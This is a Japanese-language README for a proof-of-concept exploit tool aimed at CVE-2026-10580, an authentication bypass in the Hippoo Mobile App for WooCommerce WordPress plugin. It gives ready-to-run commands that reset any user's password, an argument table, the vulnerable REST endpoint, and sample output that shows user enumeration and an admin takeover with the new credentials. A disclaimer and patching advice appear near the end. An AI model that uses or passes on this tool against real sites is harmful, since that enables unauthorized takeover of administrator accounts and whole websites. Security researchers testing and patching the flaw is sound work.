
CVE-2026-10580 の PoC エクスプロイト - Hippoo Mobile App for WooCommerce (バージョン 1.9.4 以下) における認証バイパス、管理者アカウントの乗っ取りにつながる
このツールは、CVE-2026-10580 の概念実証エクスプロイトです。この脆弱性は、WordPressプラグイン Hippoo Mobile App for WooCommerce(バージョン <= 1.9.4)に影響を与える認証バイパスの脆弱性です。この脆弱性により、認証されていない攻撃者が管理者を含む任意のユーザーのパスワードをリセットし、サイト全体を乗っ取ることが可能になります。
⚠️ 重要: このツールは許可されたセキュリティテストおよび教育目的のみを対象としています。所有していないシステムや明示的なテスト許可がないシステムに対して不正に使用することは違法です。
requests ライブラリ依存関係のインストール:
pip install requests
python3 exploit.py -t https://target-site.com -p NewPassword123!
デフォルトの管理者ID (1) とSSL検証を使用した攻撃:
python3 exploit.py -t https://example.com -p PwnedCVE2026!!
特定のユーザーIDをターゲットにし、SSL検証を無効にする:
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k
バナーなしで実行:
python3 exploit.py -t https://example.com -p NewPass123 --no-banner
[+] Found 3 user(s)
- User ID: 1 | Username: admin | Role: administrator
- User ID: 2 | Username: editor_user | Role: editor
- User ID: 3 | Username: subscriber1 | Role: subscriber
╔══════════════════════════════════════════════════════════════╗
║ ADMIN TAKEOVER SUCCESSFUL ║
╚══════════════════════════════════════════════════════════════╝
Target: https://example.com
Login: https://example.com/wp-admin
Username: admin
Password: PwnedCVE2026!!
Hippooプラグインを使用している場合は、直ちにパッチ済みバージョン(>1.9.4)にアップデートしてください。さらに:
/wp-json/wc-hippoo/v1/ext/wp/v2/users への予期しないAPIリクエストを監視するこのプロジェクトはMITライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。
0xgh057r3c0n
作者はこのツールの誤用について一切の責任を負いません。責任を持って使用し、所有しているか明示的なテスト許可があるシステムでのみ使用してください。
| 引数 | 説明 |
|---|
-t, --target | ターゲットのWordPressサイトURL(例:https://example.com) |
-p, --password | 管理者アカウントに設定する新しいパスワード |
-i, --id | 乗っ取るユーザーID(デフォルト: 1) |
-k, --insecure | SSL証明書の検証をスキップ |
--no-banner | ASCIIバナーを非表示 |